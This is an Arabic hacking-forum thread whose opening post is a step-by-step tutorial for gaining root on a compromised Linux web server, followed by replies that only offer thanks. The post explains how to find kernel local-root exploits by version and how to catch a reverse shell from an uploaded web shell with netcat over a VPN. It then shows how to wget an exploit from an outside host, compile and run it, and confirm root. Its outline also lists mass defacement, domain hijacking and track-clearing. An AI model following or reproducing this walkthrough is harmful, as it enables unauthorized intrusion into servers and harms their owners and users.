• أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
  • بادئ الموضوع SaDaM
  • تاريخ البدء
الحالة
مغلق و غير مفتوح للمزيد من الردود.
Developer

  • إنضم
    19 يوليو 2012
    المشاركات
    51
    الإعجابات
    3
    النقاط
    30
    العمر
    28
    نظام التشغيل
    linux
    التوجّه
    white_hat
    برنامج الحماية ؟
    avira
    المتصفح
    firefox
    الإقامة
    Adobe Photoshop CS
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 30
    رصيدي البنكي الحالي ( 0 )
    المستوى 3
#1


بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

موضوعنا اليوم مفيد بأدن الله الكل يستفاد منه


في بداية الامر سوف ينقسم هذا الموضوع الى
  1. الجزء الاول: ماهو الروت (What is root)
  2. الجزء الثاني: كيف يمكن الحصول على الروت (How can I get on the root)
  3. الجزء الثالث: اللوكل روت وكيف البحث عنة (local root and how to search for him)
  4. الجزء الرابع: اتصال بلسيرفر بكل الطريق (Contact server Every way)
  5. الجزء الخامس: الحصول على الروت (Access to root)
  6. الجزء السادس: ماذا بعد الروت (What happens after root)
  7. الجزء السابع: سحب الدومنين (The withdrawal of my domain)
  8. الجزء الثامن: عمل ماس ديفس (The work of Mass Davis)
  9. الجزء التاسع: التسجيل فى الزون اتش المواقع المخترقة (To register the zon-h hacked sites)
  10. الجزء العشر: مسح اثارك من السيرفر (Clear the tracks from the serve)
  11. الجزء الحادي عشر: بعض المواضع الاخرى للروت وبعد الروت

[NEW]الجزء الاول: ماهو الروت[/NEW]
الروت : هو اعلى صلاحية في السيرفر لينكس واذا حصل شخص على صلاحية الروت يكون السيرفر كلة في خطر تام كيف يكون السيرفر في خطر انة اقول لك يمكن بعد الحصول على الروت يمكن تسحب الدومنينات المواقع ويمكن تغير جميع انديكسات الموقع بأنديكس اختراق وهذا مايسمى بلــــماس ديفس وراح اشرح في الفقرات التالية وذا حصلت على الروت يكون السيرفر ملكك وهنا فهمنا ماهو الروت واكيد لي يريد يأخذ روت لازم يعرف ماهو الروت اصلا ويكون لدية خبرة في اختراق المواقع


[NEW]الجزء الثاني: كيف يمكن الحصول على الروت[/NEW]
هناك طرق كثيرة في الحصول على الروت وسوف اذكر اهم الطرق وهي...)
1-عن طريق اللوكل روت وهي استغلال ثغرة في بكرنيل السيرفر ,وحسب اصدار الكرنيل
2-عن طريق استغلال ثغرات البرنامج لي على السيرفر
3-عن طريق قرأة الملفات لي يكون فية باسورد الروت
وهم طريقة والطريقة الشائعة الان هي طريقة اللوكل الروت واصدار الكرنيل لان نشرح هذة الطريقة
لكل سيرفر كرنيل واصدار لهذا الكرنيل والهكر الكبار يجدون ثغرة لهذا الاصدار الكرنيل وينقلون هذة الثغرة في اصدار الكرنيل الى مواقع السيكورتي واحنة نستغل هذة الثغرة ومايسمى بلوكل روت وعن طريق الاستغلال هذة الثغرة في السيرفر نحصل على الروت وان شاء الله اشرح لكم الطرق الباقية بأذن الله


[NEW]الجزء الثالث: اللوكل روت وكيف البحث عنة (local root and how to search for him)[/NEW]
في البداية لنعرف ماهو لوكل الروت :برنامج مبرمج لستغلال ثغرة في اصدار الكرنيل ولوكلات مبرمجة بلغة c وهناك لوكلات مترجمة وذا كان اللوكل مبرمجة بلغة c يحتاج لها ترجمة قبل التشغيل وسوف اشرح لكم في الفقرات التالية بس كيف نفرق بين المترجم والغير مترجم انة اقول لك اذا لوكل منتهي بمتداد c فانة غير مترجم ويحتاج ترجمة واذا لوكل منتهي بغير امتداد او اي امتداد اخر فانة مترجم بس لماذا اللوكل دائما بلغة c لان نوة الكرنيل في نضام لينكس تكون مبرمجة بلغة c شفتوا لازم تتعلموا لينكس لانهو يفيدكم كثيرا
الان كيف نعرف لوكل المناسب لنا وكيف نقوم بلبحث عنة قي البداية عندما ترفع الشل على السيرفر نقوم بتنفيذ الامر التالي (uname -a)

اصدار الكرنيل :
الي بلون الاخضر ذا اصدار الكرنيل
ولي بلون الازرق ذا النحديث نواة الكرنيل
او يمكن تنفيذ الامر التالي uname -a ايظا ليظهر لك اصدار لوكل
الان نريد كيف نبحث على هذا اصدار الكرنيل نريد لة لوكل روت كيف
اولا:عن طريق عمو قوقل كيف تروح لقوقل وتكتب
PHP:
local root xxx
حيث 2.x.x نضع بدلة اصدار الكرنيل
او
PHP:
local root exploit 2.xx
حيث xxx اصدار الكرنيل نضعة بدلة
ولازم تعرف تحديث الكرنيل مثيل 2011 او 2012 لان كل لوكل يختلف في التحديث

ثانيا:عن طريق مواقع السكيورتي
سوف اشرح على اهم موقع لان والاقوى
هذا الموقع
الروابط تضهر للاعضاء فقط سجل دخولك أو قم بالتسجيل الآن.


وتضغط على كلمة Search من اعلى الخيارات ويظهر لك

ونكتب في البحث كذا
PHP:
localroot xxx
حيث 2.XX نضع بدلة اصدار الكرنيل
وتختار النوع

وان شاء الله راح تحصل على لوكل روت المناسب
وهذا مواقع لبحث على لوكل

PHP:
http://packetstormsecurity.com/
http://www.1337day.org/
http://www.exploit-db.com

[NEW]الجزء الرابع: اتصال بل سيرفر بكل الطريق[/NEW]
اهم يشيء بعد الحصول على لوكل روت هو الاتصال بلسيرفر يعني اذا ماتصلنة بلسيرفر ماراح نحصل على روت والاتصال بلسيرفر يعني بدل ماتروح لشل تروح ل الدوس وتنفذ الاوامر وهناك طرق كثير لاتصال بلسيرفر
وانة راح اشرح لكم طريقة لي مايستطيع فتح بورت في جهازة مثلي

هناك طرق كثيرة لتسجيل في موقع VPN ماني راح اشرح انتة احصل على حساب والان بعد الحصول على حساب
والان بعد الحصول على الحساب يمكنك ان تتصل وانشاء اتصال VPN

الان سوف اشرح لكم الاتصال بلسيرفر بعد ماعملة اتصال VPN يلا نبدأ على بركة الله
في البداية الأمر نحمل هذة الاداة وهي netcat
[DOWNLOAD]
الروابط تضهر للاعضاء فقط سجل دخولك أو قم بالتسجيل الآن.
[/DOWNLOAD]
نفك الضغط عنها ونضعها على مسار الهارد c او اي هارد انتة واضع الوندوز فية
الان كل شيء تمام نحمل الشل

نرفع الشل على موقع المصاب او الموقع لي انتة تريد الحصول علية على روت اوكي

الان نذهب الى الدوس كما يلي

start>>Run>>cmd
تم الدخول لــــ
PHP:
dos
ونضع الامر التالي
PHP:
cd\
وبعد ذلك ندخل الى حافظة النت كات بلأمر
cd netcatتم الدخول من أحسن تسميت مجلد nc الانو أغلبية الهكرز يضعون شروحات ب nc
اوكي كل شيء تمام

لمعرفة ip الخاص فينة
الان نذهب الى الشل لي احنة رافعينة على الموقع الى اخر الشل
-ip لي احنة طلعناة من الموقع لي فوق
2-البورت وراح نستخدم بورت 443 البورت الخاص في اتصال ريلاكس
3-لانغير شيء
4-لاتضغ الان بعد قليل من اقول لك
الان كل شيء تمام نرجع الى النت كات
ونكتب الامر
PHP:
nc -l -n -v -p port
مع تغير port
الى 443 بورت اتصال ريلاكس
الان نضغط انتر (enter)
الان تم الاتصال بلشل الان انتهينة من هذة الخطوة الحمد لله

ولي مايستطيع الحصول على حساب ريلاكس يمكنة استخدام هذا البرنامج فهوا عملة نفس عمل حساب ريلاكس واسم البرنامج هو CyberGhost VPN ويمكنك البحث عنة قوقل وسوف تجد لة شروحات كثيرة وهو مشهور جدا ^_*


[NEW]الجزء الخامس: الحصول على الروت (Access to root)[/NEW]
بعد ما اتصلنة بلسيرفر ووجدنة اللوكل المناسب الان نريد سحب الروت على السيرفر
اول شيء لحصول على الروت هو سحب لوكل على الموقع ويقصل ان يكون المجلد يحمل تصريح 777
ويسحب اللوكل بامر
PHP:
wegt www.XXXXXX.com/localroot.zip
wegt<<<الامر السحب
www.viers.com/local.zip<<<موقع لوكل او انتة ترفع لوكل على اي موقع مجاني ويفض لوكل بمتداد zip
الان تم السحب
نفط الضغط بامر
PHP:
unzip local.zip
unzip<<<امر فك الضغط
local.zip<<<اسم لوكل مع الامتداد
الان نعطي لوكل تصريح 777 بامر
PHP:
chmod 777 local.c
chmod<<<امر تغير تصريح اي ملف
777<<<رقم التصريح
local.c<<<لوكل

بعد ذلك نترجم اللوكل بامر التالي
PHP:
gcc local.c –o local
بعد سوف تجد لوكل بدون امتداد هكذا


local

بعد ذلك نعطي اللوكل المترجم تصريح 777 بامر التالي

PHP:
chmod 777 local 

بعد ذلك نشغل اللوكل بامر

[PHP]local ./ 

وسوف يشتغل لوكل

 نقوم بتنفيذ

الامر التالي لرؤية الاصلاحية الان

ID

الان صلاحيتنة روت 

 ننفذ لامر التالي

su 

لحصول على صلاحية روت كاملة 

[IMG]http://www.iq-team.org/elan/by3.png[/IMG]
[/CENTER]
[/CENTER]
 


Developer

  • إنضم
    14 مارس 2012
    المشاركات
    61
    الإعجابات
    6
    النقاط
    30
    العمر
    24
    نظام التشغيل
    linux
    التوجّه
    white_hat
    برنامج الحماية ؟
    f_secure
    المتصفح
    firefox
    الإقامة
    لــبــنــان
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 30
    رصيدي البنكي الحالي ( 0 )
    المستوى 6
#2
رد: توضيحات مهمه كيف اخذ صلاحيات Root للتحكم الكامل بالسرفر المخترق

يعطيك العافيه اخوي ما قصرت
موضوع مهم جدآ:{1}:​
 


Active DeveloPer

  • إنضم
    12 مارس 2012
    المشاركات
    81
    الإعجابات
    1
    النقاط
    30
    العمر
    26
    نظام التشغيل
    linux
    التوجّه
    white_hat
    برنامج الحماية ؟
    mcafee
    المتصفح
    firefox
    الإقامة
    الاردن
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 30
    رصيدي البنكي الحالي ( 0 )
    المستوى 1
#3
رد: توضيحات مهمه كيف اخذ صلاحيات Root للتحكم الكامل بالسرفر المخترق

بارك الله فيك اخي
ما قصرت . تستاهل احلى تقيم
 


Developer

  • إنضم
    23 يونيو 2012
    المشاركات
    48
    الإعجابات
    2
    النقاط
    30
    نظام التشغيل
    windows_7
    التوجّه
    grey_hat
    برنامج الحماية ؟
    zonealarm
    المتصفح
    chrome
    الإقامة
    ..| ღ |..
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 30
    رصيدي البنكي الحالي ( 0 )
    المستوى 2
#4
رد: توضيحات مهمه كيف اخذ صلاحيات Root للتحكم الكامل بالسرفر المخترق

وعليكم آلسسسلأم ورحمه آلله وبركـآته ,

آلله يعطيك العـآفيه على الموضوع المفيد



)5:"​
 


Developer

  • إنضم
    14 يوليو 2012
    المشاركات
    38
    الإعجابات
    0
    النقاط
    30
    العمر
    30
    نظام التشغيل
    linux
    برنامج الحماية ؟
    mcafee
    المتصفح
    chrome
    الإقامة
    المغرب
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 30
    رصيدي البنكي الحالي ( 0 )
    المستوى 0
#5
رد: توضيحات مهمه كيف اخذ صلاحيات Root للتحكم الكامل بالسرفر المخترق

يعطيك العافيه​
 


Developer

  • إنضم
    19 نوفمبر 2012
    المشاركات
    41
    الإعجابات
    0
    النقاط
    30
    التوجّه
    none_hat
    برنامج الحماية ؟
    eset_nod
    المتصفح
    firefox
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 30
    رصيدي البنكي الحالي ( 0 )
    المستوى 0
#6
رد: توضيحات مهمه كيف اخذ صلاحيات Root للتحكم الكامل بالسرفر المخترق

درس جميل وافادني جدا شكرا لك استاذي ...}
 


Developer

  • إنضم
    9 ديسمبر 2011
    المشاركات
    52
    الإعجابات
    1
    النقاط
    30
    العمر
    29
    نظام التشغيل
    linux
    برنامج الحماية ؟
    bit_defender
    الإقامة
    في عالم لا يسكنه غيريُ
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 30
    رصيدي البنكي الحالي ( 0 )
    المستوى 1
#7
رد: توضيحات مهمه كيف اخذ صلاحيات Root للتحكم الكامل بالسرفر المخترق


بارك الله فيك يابعدي
)4:")4:")4:"​
 


Developer

  • إنضم
    22 يناير 2012
    المشاركات
    20
    الإعجابات
    0
    النقاط
    5
    العمر
    26
    نظام التشغيل
    windows_vista
    التوجّه
    white_hat
    برنامج الحماية ؟
    trend_micro
    المتصفح
    firefox
    الإقامة
    مصـ ام الدنيا ـر
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 5
    رصيدي البنكي الحالي ( 0 )
    المستوى 0
#8
رد: توضيحات مهمه كيف اخذ صلاحيات Root للتحكم الكامل بالسرفر المخترق

يعطيك العافيـة يامبدع

مجهود كبير ، تسلم ايدك
 


توضيحات مهمه كيف اخذ صلاحيات Root للتحكم الكامل بالسرفر المخترق
الحالة
مغلق و غير مفتوح للمزيد من الردود.